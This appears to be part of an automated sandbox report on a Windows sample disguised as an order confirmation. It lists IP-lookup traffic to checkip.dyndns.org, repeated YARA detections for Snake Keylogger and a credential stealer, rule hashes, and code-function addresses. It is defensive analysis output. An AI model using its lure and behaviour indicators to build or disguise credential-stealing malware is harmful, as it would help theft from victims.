                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6824, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6568, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6824, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6568, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253C1240_2_0253C124
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253E5700_2_0253E570
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253E5630_2_0253E563
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EC1D712_2_014EC1D7
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EE18212_2_014EE182
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EE5E212_2_014EE5E2
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014E35A012_2_014E35A0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014ED66012_2_014ED660
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014E86B012_2_014E86B0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014E4B9812_2_014E4B98
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EEA4012_2_014EEA40
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014ECD6012_2_014ECD60
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EDCF612_2_014EDCF6
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EEEA112_2_014EEEA1
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014ED65012_2_014ED650
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EB6E812_2_014EB6E8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EB6F812_2_014EB6F8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014E2C3112_2_014E2C31
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654565012_2_06545650
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654B24812_2_0654B248
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654E21012_2_0654E210
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065486D812_2_065486D8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654BAF812_2_0654BAF8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654B6A012_2_0654B6A0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654BF5012_2_0654BF50
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06548B3012_2_06548B30
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065493E012_2_065493E0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06548F8812_2_06548F88
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654C3A812_2_0654C3A8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654CC5812_2_0654CC58
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654C80012_2_0654C800
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654983812_2_06549838
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654A0E812_2_0654A0E8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06549C9012_2_06549C90
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654D0B012_2_0654D0B0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654A54012_2_0654A540
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654D96012_2_0654D960
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654D50812_2_0654D508
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654113012_2_06541130
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654ADF012_2_0654ADF0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654A99812_2_0654A998
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654DDB812_2_0654DDB8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654B23812_2_0654B238
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065486C712_2_065486C7
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654BAE812_2_0654BAE8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654B69112_2_0654B691
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654BF4212_2_0654BF42
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06548F7812_2_06548F78
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06548B2112_2_06548B21
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065493D212_2_065493D2
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654C7F012_2_0654C7F0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654C39812_2_0654C398
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654CC4812_2_0654CC48
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654982812_2_06549828
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654A0D812_2_0654A0D8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654D4FA12_2_0654D4FA
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06544C9A12_2_06544C9A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06549C8012_2_06549C80
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654D0A012_2_0654D0A0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06544CA812_2_06544CA8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654A53012_2_0654A530
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654112A12_2_0654112A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654ADE012_2_0654ADE0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654A98A12_2_0654A98A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0654DDA912_2_0654DDA9
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065726D012_2_065726D0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065756E812_2_065756E8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065797C812_2_065797C8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657A46812_2_0657A468
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657340012_2_06573400
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065784E012_2_065784E0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657458812_2_06574588
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657529012_2_06575290
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065763F012_2_065763F0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657004012_2_06570040
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657917812_2_06579178
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657410812_2_06574108
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065771F812_2_065771F8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06579E1812_2_06579E18
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06574E3812_2_06574E38
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06577E9812_2_06577E98
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06575F9812_2_06575F98
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06572FA812_2_06572FA8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06570C6812_2_06570C68
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06573CB012_2_06573CB0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657AAB012_2_0657AAB0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06572B5012_2_06572B50
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06575B4012_2_06575B40
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06578B2812_2_06578B28
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657385812_2_06573858
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657784812_2_06577848
